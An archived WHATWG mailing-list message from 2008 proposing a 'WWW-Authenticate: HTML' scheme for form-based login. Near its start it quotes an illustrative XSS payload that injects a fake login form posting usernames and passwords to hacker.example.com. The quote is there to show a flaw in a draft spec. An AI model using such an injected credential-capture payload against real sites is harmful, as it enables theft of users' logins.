W3C home > Mailing lists > Public > whatwg@whatwg.org > November 2008

[whatwg] Solving the login/logout problem in HTML

From: Martin Atkins <mart@degeneration.co.uk>
Date: Thu, 27 Nov 2008 00:18:43 -0800
Message-ID: <492E57E3.3060007@degeneration.co.uk>
Ian Hickson wrote:
> On Wed, 26 Nov 2008, Philip Taylor wrote:
>> If I'm not misunderstanding things, there is a new attack scenario:
>>
>> I post a comment on someone's blog, saying <a 
>> href="/restricted-access.php?xsshole=<form 
>> action=http://hacker.example.com/capture name=login><input 
>> name=username><input name=password></form>">crawl me!</a>
>>
> 
> Hm, this is indeed a problem.
> 
[snip]
> 
> Is there anyone who can volunteer to edit this section as a separate spec?
> 
> I guess I'll remove this section.
> 

I may be forgetting missing some use-cases here (I don't recall what 
exactly motivated this custom auth scheme) but there may still be value 
in a cut-down version of this scheme:

WWW-Authenticate: HTML

which means (roughly) "The HTML document in the body contains something 
that, when displayed in a web browser, will allow the user to log in".

Browsers can then use this authentication scheme in preference to Basic 
or Digest when multiple schemes are offered for a particular resource, 
and servers can simultaneously offer forms-based authentication and 
other authentication schemes at the same endpoint:

HTTP/1.1 401 Unauthorized
Content-type: text/html
WWW-Authenticate: HTML
WWW-Authenticate: Basic realm="my neat site"

<form action="/login" method="POST">
...
</form>

Software that is not a browser (for some suitable definition of 
"browser" -- something along the lines of "user-agent where form-based 
auth is the norm"?) can choose to use Basic authentication here.

The backward-compatibility story here is bad as long as one of the 
offered authentication schemes is known to a downlevel browser. Per my 
basic research posted earlier, other, as-yet-unsupported schemes can be 
offered and the body will be rendered as desired except in Opera.

I guess that this could be generalized to:
WWW-Authenticate: Body

meaning merely "the body contains something that will allow the user to 
log in". Browsers could presumably in this case take into account the 
Content-type when deciding whether to prefer this scheme over the other 
schemes offered, for example choosing Body over Basic only when 
Content-type is text/html.

I concede that once you generalize it in this way it becomes even less 
relevant to the HTML spec than it was to begin with, though I'm not sure 
where else to propose such a thing, and in practice as long as websites 
are primarily HTML login forms presumably will be as well.
Received on Thursday, 27 November 2008 00:18:43 UTC

This archive was generated by hypermail 2.4.0 : Wednesday, 22 January 2020 16:59:07 UTC